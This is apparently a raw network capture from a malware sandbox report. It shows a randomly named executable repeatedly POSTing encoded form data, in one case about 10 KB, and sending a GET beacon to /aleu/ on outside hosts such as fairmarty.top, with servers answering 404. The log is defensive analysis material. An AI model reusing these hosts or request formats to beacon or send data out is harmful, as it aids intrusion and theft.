                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.skibinscy-finanse.pl
                                                                                                                                                                                                        Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 75 78 33 33 71 73 53 73 43 54 76 4b 6a 37 67 77 36 37 53 4d 4c 30 61 6d 71 72 79 72 66 73 4a 4e 5a 76 64 78 2b 7a 30 31 45 6a 56 74 47 32 57 50 63 37 42 59 58 65 63 49 41 67 4b 44 43 6d 47 52 35 6e 6d 4e 53 4c 69 54 70 51 52 4e 35 39 50 78 67 71 52 57 54 6d 6a 75 62 49 4d 2f 6a 55 6c 70 46 30 51 54 39 39 65 4c 44 47 42 51 49 6e 49 65 4d 54 47 53 58 78 5a 56 4c 75 61 48 6e 6d 53 4f 74 58 6b 75 61 71 6e 51 53 78 74 59 78 57 2f 65 41 4a 58 6a 50 47 46 55 74 53 57 41 2f 50 78 4e 53 68 38 63 49 4a 6d 71 34 66 41 51 73 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+ux33qsSsCTvKj7gw67SML0amqryrfsJNZvdx+z01EjVtG2WPc7BYXecIAgKDCmGR5nmNSLiTpQRN59PxgqRWTmjubIM/jUlpF0QT99eLDGBQInIeMTGSXxZVLuaHnmSOtXkuaqnQSxtYxW/eAJXjPGFUtSWA/PxNSh8cIJmq4fAQs=
                                                                                                                                                                                                        May 8, 2024 18:21:54.953469038 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:21:54 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 196
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        15192.168.2.449759178.211.137.59804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:21:59.315776110 CEST10859OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.skibinscy-finanse.pl
                                                                                                                                                                                                        Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 41 32 48 59 2b 71 4a 42 4b 6a 2f 6d 4f 50 59 62 59 52 44 79 4c 59 2f 5a 70 50 70 70 55 45 78 35 78 64 35 38 32 52 2f 43 62 2b 6d 78 33 46 79 73 41 4e 43 54 75 4b 6a 37 76 67 36 41 53 4d 4c 54 61 6d 79 76 79 71 6a 38 4a 50 68 76 53 7a 6d 7a 67 51 77 6a 4d 64 47 32 55 50 63 41 4d 34 57 63 63 49 77 6b 4b 44 79 6d 47 52 35 6e 6d 4c 75 4c 30 32 56 51 54 4e 35 38 4f 78 67 6d 62 32 54 4b 6a 75 43 39 4d 2f 6d 76 6c 5a 6c 30 54 7a 74 39 53 5a 72 47 62 51 49 6c 50 65 4e 4f 47 53 4b 32 5a 56 58 59 61 48 54 4d 53 4a 46 58 6b 71 72 73 6a 51 43 68 70 59 64 30 37 4d 56 69 62 43 2f 58 43 6d 56 73 58 79 6e 45 73 76 61 71 37 4c 70 62 35 62 34 33 66 56 62 71 53 62 70 50 78 55 6b 68 55 4d 49 38 63 67 4a 62 57 36 32 57 53 4b 42 79 51 62 41 4a 33 69 74 6f 30 72 71 64 33 6b 68 78 38 54 58 79 45 44 6f 33 37 69 68 4d 35 76 43 65 74 53 77 79 57 61 58 6c 45 4c 45 76 51 7a 7a 50 52 65 53 32 36 67 68 75 4b 5a 47 55 6e 55 39 35 5a 48 35 39 56 47 62 47 41 57 73 75 4f 65 2b 58 4b 44 6a 6e 57 6d 6e 58 64 46 46 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: jn4lNb=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+mx3FysANCTuKj7vg6ASMLTamyvyqj8JPhvSzmzgQwjMdG2UPcAM4WccIwkKDymGR5nmLuL02VQTN58Oxgmb2TKjuC9M/mvlZl0Tzt9SZrGbQIlPeNOGSK2ZVXYaHTMSJFXkqrsjQChpYd07MVibC/XCmVsXynEsvaq7Lpb5b43fVbqSbpPxUkhUMI8cgJbW62WSKByQbAJ3ito0rqd3khx8TXyEDo37ihM5vCetSwyWaXlELEvQzzPReS26ghuKZGUnU95ZH59VGbGAWsuOe+XKDjnWmnXdFF0a8BdWcffrfYeyUwKCJyznF94hF6zeaYzBICfy8UTRnxMQIIvBFbLSf0q1nRT4SIBOiJIwPLEdEjPxlYcxr5t4gjStAE3WX8Yt+NA6OFlHJDIU3AoMWPRIjlwX7bgN0LvfypRNCaFRogsu49CO/1XbHiHNYtY69FVjYFZE7mh2kUkAM1tN711ldHT8DAJLzVBHAUoQBm14Cpz/6uU7+3CmbeEDnsm+Bh71oWtAguHgx3lLQrtnq+TMR5Z8ZraxaSnx6MFXQs8z1zjgHvNBiW8MVk9Ygl6uahNf0zlBhqrm7kZ6OfQNh3R7Y5RRxefVBoqZKjMRQIn09Puw9RL2gkdfE5POq6LN3PIweGyTF18w46wJjFV5aLcxBuBFOAiNqATlT3cT8mkzLYaDJsnZjVvCC3c7UcLnOE5t70P6NmzCtCMm44GI4YFFF9Hb301Vkd6cLgnavqFxHHyXh2yKvTRFmaFc8NISFUW9y2D3Kqt+mD3AHxvSOyGMeaor1p2URHabiRkNd95YmNl76plpr10VDGcljVfncvohYQmXgEeA4vcD1JxOJwxE9ErAJcE36vgCAbnMcyIgTz4HZio+mMZcU6LI3/5dx5/4ZmpKKdZQuIK/Nn2mWXy6yoQBxX2uV7fuAIPsmf/dTH6ZZOLCCYhdOuVIiY2y3JIr [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:21:59.653203964 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:21:59 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 196
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        16192.168.2.449760178.211.137.59804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:02.183176041 CEST485OUTGET /aleu/?jn4lNb=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.skibinscy-finanse.pl
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:22:02.518805981 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:02 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 196
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        17192.168.2.449761203.161.46.103804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:17.127955914 CEST736OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Origin: http://www.fairmarty.top
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 4c 77 4a 39 45 44 4e 48 6c 4b 36 58 68 55 37 41 6b 41 33 37 43 58 75 48 48 38 79 44 79 62 49 6c 31 38 34 38 51 4d 34 4b 67 43 67 63 66 62 43 7a 46 6e 59 55 58 6e 50 66 54 30 48 71 54 58 49 52 46 62 31 2b 64 76 2b 63 4b 66 5a 48 51 4a 4d 31 48 71 42 4e 71 4f 64 75 38 6f 57 76 64 6a 53 63 62 4e 68 61 74 79 6c 5a 63 67 67 44 6d 72 48 67 34 61 44 74 6f 4b 56 4e 74 33 59 6a 56 4d 4e 69 72 4e 6c 61 33 2b 54 6d 4a 47 4c 59 58 62 31 46 72 51 7a 68 44 73 2b 4b 63 55 39 68 75 53 67 2f 6b 68 6a 48 45 6a 71 32 71 64 70 4f 2b 41 4b 6a 6d 6a 6d 4c 7a 67 3d 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=4GbMTgr0j9lSLwJ9EDNHlK6XhU7AkA37CXuHH8yDybIl1848QM4KgCgcfbCzFnYUXnPfT0HqTXIRFb1+dv+cKfZHQJM1HqBNqOdu8oWvdjScbNhatylZcggDmrHg4aDtoKVNt3YjVMNirNla3+TmJGLYXb1FrQzhDs+KcU9huSg/khjHEjq2qdpO+AKjmjmLzg==
                                                                                                                                                                                                        May 8, 2024 18:22:17.342128038 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:17 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        18192.168.2.449762203.161.46.103804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:19.862302065 CEST756OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Origin: http://www.fairmarty.top
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 5a 67 35 39 42 69 4e 48 69 71 36 55 2f 45 37 41 76 67 33 6e 43 58 69 48 48 35 53 54 79 70 73 6c 31 64 49 38 54 4e 34 4b 75 69 67 63 56 37 44 35 42 6e 59 4b 58 67 48 39 54 31 37 71 54 58 4d 52 46 65 78 2b 64 66 43 62 4c 50 5a 42 62 70 4d 7a 61 61 42 4e 71 4f 64 75 38 6f 53 42 64 6a 4b 63 62 39 52 61 74 51 4d 50 53 41 68 78 78 62 48 67 79 36 44 70 6f 4b 56 6a 74 7a 51 46 56 50 31 69 72 4d 31 61 33 72 6d 77 44 47 4c 65 54 62 30 4b 6e 51 57 34 48 2f 58 6c 58 57 30 50 76 78 55 62 73 48 79 64 56 53 4c 68 34 64 4e 39 6a 48 44 58 72 67 62 43 6f 68 77 44 43 52 63 4f 70 4f 49 2f 31 69 70 52 6f 63 6e 36 51 30 30 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypsl1dI8TN4KuigcV7D5BnYKXgH9T17qTXMRFex+dfCbLPZBbpMzaaBNqOdu8oSBdjKcb9RatQMPSAhxxbHgy6DpoKVjtzQFVP1irM1a3rmwDGLeTb0KnQW4H/XlXW0PvxUbsHydVSLh4dN9jHDXrgbCohwDCRcOpOI/1ipRocn6Q00=
                                                                                                                                                                                                        May 8, 2024 18:22:20.073838949 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:19 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        19192.168.2.449763203.161.46.103804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:22:22.601840019 CEST10838OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.fairmarty.top
                                                                                                                                                                                                        Origin: http://www.fairmarty.top
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 10303
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 34 47 62 4d 54 67 72 30 6a 39 6c 53 5a 67 35 39 42 69 4e 48 69 71 36 55 2f 45 37 41 76 67 33 6e 43 58 69 48 48 35 53 54 79 70 6b 6c 31 76 41 38 54 75 41 4b 76 69 67 63 57 37 44 36 42 6e 5a 57 58 6d 76 35 54 31 33 63 54 56 45 52 45 38 35 2b 62 74 6d 62 41 50 5a 42 55 4a 4d 32 48 71 42 59 71 4f 4e 71 38 6f 69 42 64 6a 4b 63 62 2f 5a 61 72 43 6b 50 51 41 67 44 6d 72 48 61 34 61 44 42 6f 4c 38 65 74 7a 63 7a 55 2f 56 69 72 73 46 61 31 64 4b 77 41 6d 4c 63 57 62 31 56 6e 51 71 64 48 2f 4c 44 58 58 42 55 76 32 38 62 70 43 76 63 42 44 48 61 76 72 64 73 77 55 37 42 69 68 4b 42 77 6d 38 58 45 67 59 4d 37 36 55 38 33 43 67 44 77 34 62 67 48 30 59 4d 76 4c 4b 6f 2b 63 74 33 75 4d 61 31 6b 51 72 53 6b 30 7a 50 36 62 38 6d 72 6e 6e 39 42 42 2b 48 41 45 48 45 77 54 2f 75 44 56 6e 49 36 65 59 2b 68 4f 65 42 70 53 77 78 4f 4f 53 44 46 52 35 64 67 78 43 36 54 48 4b 50 50 42 43 4b 44 68 73 39 4a 74 6f 53 6c 6c 77 72 4f 75 51 33 79 76 63 6f 64 74 36 7a 52 76 62 67 4e 76 66 58 4e 36 33 49 63 6e 50 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: jn4lNb=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypkl1vA8TuAKvigcW7D6BnZWXmv5T13cTVERE85+btmbAPZBUJM2HqBYqONq8oiBdjKcb/ZarCkPQAgDmrHa4aDBoL8etzczU/VirsFa1dKwAmLcWb1VnQqdH/LDXXBUv28bpCvcBDHavrdswU7BihKBwm8XEgYM76U83CgDw4bgH0YMvLKo+ct3uMa1kQrSk0zP6b8mrnn9BB+HAEHEwT/uDVnI6eY+hOeBpSwxOOSDFR5dgxC6THKPPBCKDhs9JtoSllwrOuQ3yvcodt6zRvbgNvfXN63IcnPv3La0I/KybOg6+paqzhLDFcqW3JX8QtVj6+AzoLoI5KG0WNkXlosDg6K1jP0pj/+X1qVBtR7Uih6VkrLp2dc0/tD0c/A18wF/Az4sA7NyFXlItsxLUcKywz7C7D4tl5VlYlGARYeE9L8TpkLbT81SuE5fMhHnp9MZJk3CL1IVF+ek6iVht+JQA0HF2nIl/jFXs3yS+JJwu2mH51o1Ibp1L2mnhQ81tUqO8YJXneWVl0NcCJVmZe4ol4P/lrOrII4GhSUwyOYJ1amW3VYkKK/ugY+4l5Jxf8PQ1vwU5vavR3gmVwrJnNhOGEAcYFq0Q1AaCr32PnqTzZ7t4KLpmTvcrAxmdKeDhesB9gPqtpmY3jcohxD2MFQeoukc8CvMte+KmxXvV2BE3YygYDUoqJJhI7G1BqUPXv/Ux2zLLeem5bmf9ZdWxh+lvip2sBWU9x0/OHW59vjmPvKDDH3XA6KyiJFXzFHeWtkNY4jKVWvYQmuB4cJ+ZufPSqhczgUQxGz0qJrKvL8PLmccRG/ZJv/BX0cP7CiB6cqeNT2N2vEgILbWX7epTpkM5sCwoZhupNivSJHWdn4AwBPcEXZgpf3WnhKLGx3j8x2u4/qRNzFX2USsrb6sLoDIsoxp2AtMDhfuZFaKIFN+dTyVWNf1HAhig2fEn5QLM76vR [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:22:22.813817978 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:22:22 GMT
                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: text/html
